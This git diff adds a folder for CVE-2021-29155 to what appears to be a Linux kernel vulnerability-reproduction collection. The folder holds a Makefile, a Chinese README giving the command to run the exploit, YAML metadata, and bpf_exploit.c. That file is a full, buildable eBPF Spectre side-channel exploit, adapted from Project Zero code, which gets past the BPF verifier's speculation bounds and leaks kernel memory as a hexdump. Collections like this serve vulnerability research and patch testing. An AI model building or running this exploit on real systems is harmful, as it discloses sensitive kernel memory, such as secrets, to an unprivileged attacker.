diff --git a/cve/linux-kernel/2021/CVE-2021-29155/Makefile b/cve/linux-kernel/2021/CVE-2021-29155/Makefile
new file mode 100644
index 0000000000000000000000000000000000000000..52f950b762be185859929dd899f0ebc77505f9e6
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-29155/Makefile
@@ -0,0 +1,3 @@
+bpf_exploit: bpf_exploit.c
+	gcc -pthread -o bpf_exploit bpf_exploit.c -Wall -ggdb -std=gnu99
+
diff --git a/cve/linux-kernel/2021/CVE-2021-29155/Readme.md b/cve/linux-kernel/2021/CVE-2021-29155/Readme.md
new file mode 100644
index 0000000000000000000000000000000000000000..db15ee7dcbbc98e8444fa34b09ff638152d46f71
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-29155/Readme.md
@@ -0,0 +1,35 @@
+# CVE-2021-29155
+
+### 漏洞描述
+
+在Linux内核5.11.x中发现一个问题。kernel/bpf/ verier .c在指针算术上执行不受欢迎的越界推测，导致侧通道攻击，从而击败Spectre缓解并从内核内存获取敏感信息。具体来说，对于指针算术操作序列，在限制后续操作时，第一个操作执行的指针修改不会被正确考虑。
+
+在推测域的指针算术的距离跟踪系统是不够的。
+
+可以通过侧通道提取内核数据。这是一个概念的证明，可以从最后一个元素开始读取到Ox5fff字节。这个漏洞在https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/kernel/bpf/verifier.c?id=7fedb63a8307dda0ec3b8969a3b233a1dd7ea8e0中被修复，如果仍想看到这个是怎么工作运行的，可以采用以下命令:
+
+```
+sudo ./bpf_exploit 0 3 0x0 0x5ff0
+```
+
+其中0,3对应于2个不同的线程，它们运行在不同的物理内核上，以便利用。
+
+### 危害等级
+
+中危
+
+### 漏洞类型
+
+缓冲区错误
+
+### 参考文献
+
+来源:FEDORA
+
+链接: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PAEQ3H6HKNO6KUCGRZVYSFSAGEUX23JL/
+
+来源:FEDORA
+
+链接: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CUX2CA63453G34C6KYVBLJXJXEARZI2X/
+
+链接：https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/CVE-2021-29155/bpf_exploit.c b/cve/linux-kernel/2021/CVE-2021-29155/bpf_exploit.c
new file mode 100644
index 0000000000000000000000000000000000000000..11187dbfa71f89d0ca7fb153f2aea12b205388c6
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-29155/bpf_exploit.c
@@ -0,0 +1,608 @@
+// Code is from Jann Horn and slightly adjusted, see
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1711
+// for more details
+#include <linux/bpf_common.h>
+#define _GNU_SOURCE
+#include <pthread.h>
+#include <assert.h>
+#include <err.h>
+#include <stdint.h>
+#include <linux/bpf.h>
+#include <linux/filter.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <asm/unistd_64.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <pthread.h>
+#include <errno.h>
+#include <limits.h>
+#include <stdbool.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stddef.h>
+#include <signal.h>
+#include <string.h>
+#include <ctype.h>
+#include <sys/mman.h>
+#include <sys/user.h>
+
+#define GPLv2 "GPL v2"
+#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))
+
+int main_cpu, bounce_cpu;
+void pin_task_to(int pid, int cpu) {
+  cpu_set_t cset;
+  CPU_ZERO(&cset);
+  CPU_SET(cpu, &cset);
+  if (sched_setaffinity(pid, sizeof(cpu_set_t), &cset))
+    err(1, "affinity");
+}
+void pin_to(int cpu) { pin_task_to(0, cpu); }
+
+
+/* registers */
+/* caller-saved: r0..r5 */
+#define BPF_REG_ARG1    BPF_REG_1
+#define BPF_REG_ARG2    BPF_REG_2
+#define BPF_REG_ARG3    BPF_REG_3
+#define BPF_REG_ARG4    BPF_REG_4
+#define BPF_REG_ARG5    BPF_REG_5
+#define BPF_REG_CTX     BPF_REG_6
+#define BPF_REG_FP      BPF_REG_10
+
+#define BPF_LD_IMM64_RAW(DST, SRC, IMM)         \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_LD | BPF_DW | BPF_IMM,         \
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = 0,                                 \
+    .imm   = (__u32) (IMM) }),                  \
+  ((struct bpf_insn) {                          \
+    .code  = 0, /* zero is reserved opcode */   \
+    .dst_reg = 0,                               \
+    .src_reg = 0,                               \
+    .off   = 0,                                 \
+    .imm   = ((__u64) (IMM)) >> 32 })
+#define BPF_LD_MAP_FD(DST, MAP_FD)              \
+  BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
+#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)        \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = OFF,                               \
+    .imm   = 0 })
+#define BPF_MOV64_REG(DST, SRC)                 \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_ALU64 | BPF_MOV | BPF_X,       \
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = 0,                                 \
+    .imm   = 0 })
+#define BPF_ALU64_IMM(OP, DST, IMM)             \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,    \
+    .dst_reg = DST,                             \
+    .src_reg = 0,                               \
+    .off   = 0,                                 \
+    .imm   = IMM })
+#define BPF_STX_MEM(SIZE, DST, SRC, OFF)        \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = OFF,                               \
+    .imm   = 0 })
+#define BPF_ST_MEM(SIZE, DST, OFF, IMM)         \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
+    .dst_reg = DST,                             \
+    .src_reg = 0,                               \
+    .off   = OFF,                               \
+    .imm   = IMM })
+#define BPF_EMIT_CALL(FUNC)                     \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_JMP | BPF_CALL,                \
+    .dst_reg = 0,                               \
+    .src_reg = 0,                               \
+    .off   = 0,                                 \
+    .imm   = (FUNC) })
+#define BPF_JMP_IMM(OP, DST, IMM, OFF)          \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_JMP | BPF_OP(OP) | BPF_K,      \
+    .dst_reg = DST,                             \
+    .src_reg = 0,                               \
+    .off   = OFF,                               \
+    .imm   = IMM })
+#define BPF_JMP_REG(OP, DST, SRC, OFF)          \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_JMP | BPF_OP(OP) | BPF_X,      \
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = OFF,                               \
+    .imm   = 0 })
+#define BPF_EXIT_INSN()                         \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_JMP | BPF_EXIT,                \
+    .dst_reg = 0,                               \
+    .src_reg = 0,                               \
+    .off   = 0,                                 \
+    .imm   = 0 })
+#define BPF_LD_ABS(SIZE, IMM)                   \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
+    .dst_reg = 0,                               \
+    .src_reg = 0,                               \
+    .off   = 0,                                 \
+    .imm   = IMM })
+#define BPF_ALU64_REG(OP, DST, SRC)             \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_ALU64 | BPF_OP(OP) | BPF_X,    \
+    .dst_reg = DST,                             \
+    .src_reg = SRC,                             \
+    .off   = 0,                                 \
+    .imm   = 0 })
+#define BPF_MOV64_IMM(DST, IMM)                 \
+  ((struct bpf_insn) {                          \
+    .code  = BPF_ALU64 | BPF_MOV | BPF_K,       \
+    .dst_reg = DST,                             \
+    .src_reg = 0,                               \
+    .off   = 0,                                 \
+    .imm   = IMM })
+
+#define BPF_TEST_INS(code_,dst_reg_,src_reg_,off_,imm_)                 \
+  ((struct bpf_insn) {                          \
+    .code  = code_,       \
+    .dst_reg = dst_reg_,                             \
+    .src_reg = src_reg_,                               \
+    .off   = off_,                                 \
+    .imm   = imm_ })
+
+
+int bpf_(int cmd, union bpf_attr *attrs) {
+  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
+}
+
+int array_create(int value_size, int num_entries) {
+  union bpf_attr create_map_attrs = {
+      .map_type = BPF_MAP_TYPE_ARRAY,
+      .key_size = 4,
+      .value_size = value_size,
+      .max_entries = num_entries
+  };
+  int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
+  if (mapfd == -1)
+    err(1, "map create");
+  return mapfd;
+}
+
+int prog_load(struct bpf_insn *insns, size_t insns_count) {
+  char verifier_log[100000];
+  union bpf_attr create_prog_attrs = {
+    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
+    .insn_cnt = insns_count,
+    .insns = (uint64_t)insns,
+    .license = (uint64_t)GPLv2,
+    .log_level = 1,
+    .log_size = sizeof(verifier_log),
+    .log_buf = (uint64_t)verifier_log
+  };
+  int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
+  int errno_ = errno;
+  printf("==========================\n%s==========================\n", verifier_log);
+  errno = errno_;
+  if (progfd == -1)
+    err(1, "prog load");
+  return progfd;
+}
+
+int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
+  int progfd = prog_load(insns, insns_count);
+
+  // hook eBPF program up to a socket
+  // sendmsg() to the socket will trigger the filter
+  // returning 0 in the filter should toss the packet
+  int socks[2];
+  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
+    err(1, "socketpair");
+  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
+    err(1, "setsockopt");
+  return socks[1];
+}
+
+/* assumes 32-bit values */
+void array_set(int mapfd, uint32_t key, uint32_t value) {
+  union bpf_attr attr = {
+    .map_fd = mapfd,
+    .key    = (uint64_t)&key,
+    .value  = (uint64_t)&value,
+    .flags  = BPF_ANY,
+  };
+
+  int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);
+  if (res)
+    err(1, "map update elem 32bit");
+}
+
+void array_set_2dw(int mapfd, uint32_t key, uint64_t value1, uint64_t value2) {
+  uint64_t value[2] = { value1, value2 };
+  union bpf_attr attr = {
+    .map_fd = mapfd,
+    .key    = (uint64_t)&key,
+    .value  = (uint64_t)value,
+    .flags  = BPF_ANY,
+  };
+
+  int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);
+  if (res)
+    err(1, "map update elem 2dw");
+}
+
+/* assumes 32-bit values */
+uint32_t array_get(int mapfd, uint32_t key) {
+  uint32_t value = 0;
+  union bpf_attr attr = {
+    .map_fd = mapfd,
+    .key    = (uint64_t)&key,
+    .value  = (uint64_t)&value,
+    .flags  = BPF_ANY,
+  };
+  int res = bpf_(BPF_MAP_LOOKUP_ELEM, &attr);
+  if (res)
+    err(1, "map lookup elem");
+  return value;
+}
+
+struct array_timed_reader_prog {
+  int control_array;
+  int sockfd;
+};
+
+struct array_timed_reader_prog create_timed_reader_prog(int timed_array_fd) {
+  struct array_timed_reader_prog ret;
+
+  /*
+   * slot 0: timed_array index
+   * slot 1: measured time delta
+   */
+  ret.control_array = array_create(4, 2);
+
+  struct bpf_insn insns[] = {
+    // r8 = index (bounded to 0x5000)
+    BPF_LD_MAP_FD(BPF_REG_ARG1, ret.control_array),
+    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
+    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
+    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
+    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
+    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
+    BPF_EXIT_INSN(),
+    BPF_LDX_MEM(BPF_W, BPF_REG_8, BPF_REG_0, 0),
+    BPF_JMP_IMM(BPF_JLT, BPF_REG_8, 0x5000, 2),
+    BPF_MOV64_IMM(BPF_REG_0, 0),
+    BPF_EXIT_INSN(),
+
+    // r7 = timed array pointer
+    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
+    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
+    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
+    BPF_LD_MAP_FD(BPF_REG_ARG1, timed_array_fd),
+    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
+    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
+    BPF_EXIT_INSN(),
+    BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),
+
+    /* get time; speculation barrier */
+    BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
+    BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),
+
+    /* do the actual load */
+    BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_8),
+    BPF_LDX_MEM(BPF_B, BPF_REG_7, BPF_REG_7, 0),
+
+    /*
+     * get time delta; speculation barrier
+     * r6 = ktime_get_ns() - r6
+     */
+    BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
+    BPF_ALU64_REG(BPF_SUB, BPF_REG_0, BPF_REG_6),
+    BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),
+
+    /* store time delta */
+    BPF_LD_MAP_FD(BPF_REG_ARG1, ret.control_array),
+    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
+    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
+    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 1),
+    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
+    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
+    BPF_EXIT_INSN(),
+    BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_6, 0),
+
+    BPF_MOV64_IMM(BPF_REG_0, 0),
+    BPF_EXIT_INSN()
+  };
+
+  ret.sockfd = create_filtered_socket_fd(insns, ARRSIZE(insns));
+  return ret;
+}
+
+void trigger_proc(int sockfd) {
+  if (write(sockfd, "X", 1) != 1)
+    err(1, "write to proc socket failed");
+}
+
+uint32_t perform_timed_read(struct array_timed_reader_prog *prog, int index) {
+  array_set(prog->control_array, 0, index);
+  array_set(prog->control_array, 1, 0x13371337); /* poison, for error detection */
+  trigger_proc(prog->sockfd);
+  uint32_t res = array_get(prog->control_array, 1);
+  if (res == 0x13371337)
+    errx(1, "got poison back after timed read, eBPF code is borked");
+  return res;
+}
+unsigned int hot_cold_limit;
+
+
+int bounce_sock_fd = -1;
+
+void load_bounce_prog(int target_array_fd) {
+  struct bpf_insn insns[] = {
+    // r7 = timed array pointer
+    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
+    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
+    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
+    BPF_LD_MAP_FD(BPF_REG_ARG1, target_array_fd),
+    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
+    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
+    BPF_EXIT_INSN(),
+
+    BPF_ST_MEM(BPF_W, BPF_REG_0, 0x1200, 1),
+    BPF_ST_MEM(BPF_W, BPF_REG_0, 0x2000, 1),
+    BPF_ST_MEM(BPF_W, BPF_REG_0, 0x3000, 1),
+
+    BPF_MOV64_IMM(BPF_REG_0, 0),
+    BPF_EXIT_INSN()
+  };
+
+  bounce_sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
+}
+
+// 1 means "bounce it", -1 means "exit now"
+volatile int cacheline_bounce_status;
+int cacheline_bounce_fds[2];
+void *cacheline_bounce_worker(void *arg) {
+  pin_to(bounce_cpu);
+
+  while (1) {
+    __sync_synchronize();
+    int cacheline_bounce_status_copy;
+    while ((cacheline_bounce_status_copy = cacheline_bounce_status) == 0) /* loop */;
+    if (cacheline_bounce_status_copy == -1)
+      return NULL;
+    __sync_synchronize();
+    trigger_proc(bounce_sock_fd);
+    __sync_synchronize();
+    cacheline_bounce_status = 0;
+    __sync_synchronize();
+  }
+}
+void bounce_cachelines(void) {
+  __sync_synchronize();
+  cacheline_bounce_status = 1;
+  __sync_synchronize();
+  while (cacheline_bounce_status != 0) __sync_synchronize();
+  __sync_synchronize();
+}
+pthread_t cacheline_bounce_thread;
+void cacheline_bounce_worker_enable(void) {
+  cacheline_bounce_status = 0;
+  if (pthread_create(&cacheline_bounce_thread, NULL, cacheline_bounce_worker, NULL))
+    errx(1, "pthread_create");
+}
+void cacheline_bounce_worker_disable(void) {
+  cacheline_bounce_status = -1;
+  if (pthread_join(cacheline_bounce_thread, NULL))
+    errx(1, "pthread_join");
+}
+
+struct mem_leaker_prog {
+  int data_map;
+  int control_map; // [bitshift, index]
+  int sockfd;
+};
+
+struct mem_leaker_prog load_mem_leaker_prog(void) {
+  struct mem_leaker_prog ret;
+
+  ret.data_map = array_create(0x6000, 1);
+  ret.control_map = array_create(16, 1);
+
+  struct bpf_insn insns[] = {
+#define BPF_REG_CONTROL_PTR BPF_REG_7
+#define BPF_REG_MAP_PTR BPF_REG_0
+#define BPF_REG_BITSHIFT BPF_REG_1
+#define BPF_REG_INDEX BPF_REG_2
+#define BPF_REG_SLOW_BOUND BPF_REG_3
+#define BPF_REG_OOB_ADDRESS BPF_REG_4
+#define BPF_REG_LEAKED_BYTE BPF_REG_4
+
+    // load control data
+    BPF_LD_MAP_FD(BPF_REG_ARG1, ret.control_map),
+    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
+    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
+    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
+    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
+    BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 0x7ff),
+    BPF_MOV64_REG(BPF_REG_CONTROL_PTR, BPF_REG_0),
+
+    // load pointer to our big array
+    BPF_LD_MAP_FD(BPF_REG_ARG1, ret.data_map),
+    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
+    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
+    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
+    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
+    BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 0x7ff),
+    BPF_MOV64_REG(BPF_REG_OOB_ADDRESS, BPF_REG_MAP_PTR),
+    BPF_ALU64_IMM(BPF_MOV, BPF_REG_9, 0x5ff0),
+    //CHANGED
+    BPF_ALU64_IMM(BPF_NEG, BPF_REG_9, 0),
+    BPF_ALU64_IMM(BPF_NEG, BPF_REG_9, 0),
+    BPF_JMP_IMM(BPF_JSLT, BPF_REG_9, 0x5fff, 2),    //show r9 is in range
+    BPF_MOV64_IMM(BPF_REG_0,0),
+    BPF_EXIT_INSN(),
+    BPF_JMP_IMM(BPF_JSGT, BPF_REG_9, 0, 2),    //show r9 is in range
+    BPF_MOV64_IMM(BPF_REG_0,0),
+    BPF_EXIT_INSN(),
+    BPF_ALU64_REG(BPF_ADD, BPF_REG_OOB_ADDRESS, BPF_REG_9),  //add something to r9
+    //CHANGED
+
+    // load bitshift and speculatively unbounded index
+    BPF_LDX_MEM(BPF_DW, BPF_REG_BITSHIFT, BPF_REG_CONTROL_PTR, 0),
+    BPF_LDX_MEM(BPF_DW, BPF_REG_INDEX, BPF_REG_CONTROL_PTR, 8),
+    BPF_ALU64_IMM(BPF_AND, BPF_REG_BITSHIFT, 0xf),
+
+    // load verifier-bounded slowly-loaded index bound
+    BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_BOUND, BPF_REG_MAP_PTR, 0x1200),
+    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_BOUND, 1),
+    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_BOUND, 2),
+
+    // speculatively bypassed bounds check
+    BPF_JMP_REG(BPF_JGT, BPF_REG_INDEX, BPF_REG_SLOW_BOUND, 0x7ff),
+
+    BPF_ALU64_REG(BPF_ADD, BPF_REG_OOB_ADDRESS, BPF_REG_INDEX),
+    BPF_LDX_MEM(BPF_B, BPF_REG_LEAKED_BYTE, BPF_REG_OOB_ADDRESS, 0),
+    BPF_ALU64_REG(BPF_LSH, BPF_REG_LEAKED_BYTE, BPF_REG_BITSHIFT),
+    BPF_ALU64_IMM(BPF_AND, BPF_REG_LEAKED_BYTE, 0x1000),
+    BPF_ALU64_REG(BPF_ADD, BPF_REG_MAP_PTR, BPF_REG_LEAKED_BYTE),
+    BPF_ALU64_IMM(BPF_ADD, BPF_REG_MAP_PTR, 0x2000),
+    BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_MAP_PTR, 0),
+
+    BPF_MOV64_IMM(BPF_REG_0, 0),
+    BPF_EXIT_INSN()
+  };
+
+  int exit_idx = ARRSIZE(insns) - 2;
+  for (int i=0; i<ARRSIZE(insns); i++) {
+    if (BPF_CLASS(insns[i].code) == BPF_JMP && insns[i].off == 0x7ff) {
+      printf("fixing up exit jump\n");
+      insns[i].off = exit_idx - i - 1;
+    }
+  }
+
+  ret.sockfd = create_filtered_socket_fd(insns, ARRSIZE(insns));
+  getchar();
+  return ret;
+}
+
+#define ABS(x) ((x)<0 ? -(x) : (x))
+
+struct array_timed_reader_prog trprog;
+
+int leak_bit(struct mem_leaker_prog *leakprog, unsigned long byte_offset,
+             unsigned long bit_index) {
+  int votes = 0;
+  for (int i=0; i<0x8; i++) {
+    if ((i & 0x3) != 0x3) {
+      array_set_2dw(leakprog->control_map, 0, 12-bit_index, 0); //wrongly guide branch predictor
+    } else {
+      array_set_2dw(leakprog->control_map, 0, 12-bit_index, byte_offset); //filter for const value (can be improved)
+      bounce_cachelines();
+    }
+
+    trigger_proc(leakprog->sockfd);
+
+    if ((i & 0x3) != 0x3) {
+
+    } else {
+      int times[2];
+      times[0] = perform_timed_read(&trprog, 0x2000);
+      times[1] = perform_timed_read(&trprog, 0x3000);
+      //printf("%u, %u\n", times[0],times[1]);
+      if (times[0] < times[1]) votes--;
+      if (times[0] > times[1]) votes++;
+    }
+  }
+
+  if (votes < 0) return 0;
+  if (votes > 0) return 1;
+  return -1;
+}
+
+int leak_byte(struct mem_leaker_prog *leakprog, unsigned long byte_offset) {
+  int byte = 0;
+  for (int pos = 0; pos < 8; pos++) {
+    int bit = leak_bit(leakprog, byte_offset, pos);
+    if (bit == -1) {
+      return -1;
+    }
+    if (bit == 1) {
+      byte |= (1<<pos);
+    }
+  }
+  return byte;
+}
+
+void hexdump_memory(struct mem_leaker_prog *leakprog,
+        unsigned long byte_offset_start, unsigned long byte_count) {
+  if (byte_count % 16)
+    errx(1, "hexdump_memory called with non-full line, want multiple of 16");
+  for (unsigned long dumped = 0; dumped < byte_count;
+          dumped += 16) {
+    unsigned long byte_offset = byte_offset_start + dumped;
+    int bytes[16];
+    for (int i=0; i<16; i++) {
+      bytes[i] = leak_byte(leakprog, byte_offset + i);
+    }
+    char line[1000];
+    char *linep = line;
+    linep += sprintf(linep, "%016lx  ", byte_offset);
+    for (int i=0; i<16; i++) {
+      if (bytes[i] == -1) {
+        linep += sprintf(linep, "?? ");
+      } else {
+        linep += sprintf(linep, "%02hhx ", (unsigned char)bytes[i]);
+      }
+    }
+    linep += sprintf(linep, " |");
+    for (int i=0; i<16; i++) {
+      if (bytes[i] == -1) {
+        *(linep++) = '?';
+      } else {
+        if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
+          *(linep++) = bytes[i];
+        } else {
+          *(linep++) = '.';
+        }
+      }
+    }
+    linep += sprintf(linep, "|");
+    puts(line);
+  }
+}
+
+int main(int argc, char **argv) {
+  setbuf(stdout, NULL);
+
+  if (argc != 5) {
+    printf("invocation: %s <main-cpu> <bounce-cpu> <hex-offset> <hex-length>\n", argv[0]);
+    exit(1);
+  }
+  main_cpu = atoi(argv[1]);
+  bounce_cpu = atoi(argv[2]);
+  unsigned long offset = strtoul(argv[3], NULL, 16);
+  unsigned long length = strtoul(argv[4], NULL, 16);
+
+  pin_to(main_cpu);
+
+  struct mem_leaker_prog leakprog = load_mem_leaker_prog();
+  trprog = create_timed_reader_prog(leakprog.data_map);
+  load_bounce_prog(leakprog.data_map);
+
+  cacheline_bounce_worker_enable();
+
+  hexdump_memory(&leakprog, offset, length);
+  return 0;
+}
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..4c330eb45bb0a98216eaf52585f12ced64c67df2
--- /dev/null
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-29155
+source: https://github.com/benschlueter/CVE-2021-29155
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: medium
+  description: |
+    An issue was discovered in the Linux kernel through 5.11.x. kernel/bpf/verifier.c performs undesirable out-of-bounds speculation on pointer arithmetic, leading to side-channel attacks that defeat Spectre mitigations and obtain sensitive information from kernel memory. Specifically, for  sequences of pointer arithmetic operations, the pointer modification performed by the first operation is not correctly accounted for when restricting subsequent operations.
+  scope-of-influence:
+    Linux-kernel ≤ 5.12
+  reference:
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PAEQ3H6HKNO6KUCGRZVYSFSAGEUX23JL/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CUX2CA63453G34C6KYVBLJXJXEARZI2X/
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 5.5
+    cve-id: CVE-2021-29155
+    cwe-id: CWE-125
+    cnvd-id: None
+    kve-id: None
+  tags: 缓冲区错误, cve2021
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index b35d0b64427106bfae1b10501e49d72e415179a1..97cab933c7d9fa87a8ce68044877be45e2620ee3 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -14,6 +14,7 @@ cve:
     - CVE-2022-33891
   linux-kernel:
     - CVE-2021-4204
+    - CVE-2021-29155
     - CVE-2021-22555
     - CVE-2021-4154
     - CVE-2021-3490